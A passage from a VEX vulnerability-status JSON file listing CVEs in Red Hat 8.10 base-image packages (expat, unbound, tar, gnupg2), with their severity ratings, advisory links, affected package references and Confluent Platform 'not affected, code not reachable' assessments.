          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56412",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libexpat before 2.8.2 does not consider XML_TOK_DATA_CHARS in doCdataSection and thus lacks handler call depth tracking for various calls from within handlers in cases of a policy violation. Thus, a use-after-free can occur. NOTE: this issue exists because of an incomplete fix for CVE-2026-50219.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56412"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56412"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1278"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56412"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56412"
        }
      ],
      "published": "2026-06-21T17:16:44+00:00",
      "updated": "2026-06-23T15:31:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56416",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L"
        }
      ],
      "cwes": [
        354
      ],
      "description": "In NLnet Labs Unbound up to and including version 1.25.1, when the validator builds the canonical RDATA form for an RRSIG-covered PX/RP/MINFO/SOA RRset, it computes the address of the second embedded domain name as 'datstart + dname_valid(datstart, ...)' and passes it straight to 'query_dname_tolower()' without checking that a second name is actually present in the RDATA. The wire-format parser accepts multi-dname RRs whose RDATA ends after the first name, so an attacker who runs a DNSSEC-signed authoritative server can deliver a record with an absent second domain name (e.g. SOA record) and cause 'query_dname_tolower()' to walk label-by-label through stale bytes in the per-worker 'env->scratch_buffer', past the end of that heap allocation if 'msg-buffer-size' has been lowered from the default. This leads to heap buffer overflow and on a release build the outcome relies heavily on the contents of the buffer tail and the adjacent heap chunk.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56416"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56416"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56416"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56416"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-56416.txt"
        }
      ],
      "published": "2026-07-22T14:17:22+00:00",
      "updated": "2026-07-24T14:25:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-5704",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        434
      ],
      "description": "A flaw was found in tar. A remote attacker could exploit this vulnerability by crafting a malicious archive, leading to hidden file injection with fully attacker-controlled content. This bypasses pre-extraction inspection mechanisms, potentially allowing an attacker to introduce malicious files onto a system without detection.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5704"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/10"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/11"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/12/2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5704"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455360"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5704"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8477-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8477-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8477-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5704"
        }
      ],
      "published": "2026-04-06T16:16:42+00:00",
      "updated": "2026-06-17T10:59:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-57062",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        1284
      ],
      "description": "CMS (Cryptographic Message Syntax) parsing in gpgsm in GnuPG through 2.5.20 mishandles the CMS format for AES-GCM because aes-ICVlen is supposed to be 12 bytes but 4 bytes is accepted. NOTE: this is related to CVE-2026-34182.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-57062"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-57062"
        },
        {
          "url": "https://blog.calif.io/p/how-to-format-a-ciphertext"
        },
        {
          "url": "https://github.com/advisories/GHSA-m6x2-4hhh-669j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57062"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57062"
        },
        {
          "url": "https://www.gnupg.org/download"
        },
        {
          "url": "https://www.gnupg.org/download/"
        }
      ],
      "published": "2026-06-23T18:18:10+00:00",
      "updated": "2026-06-25T20:16:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.2.20-4.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5713",
      "ratings": [
        {
          "source": {
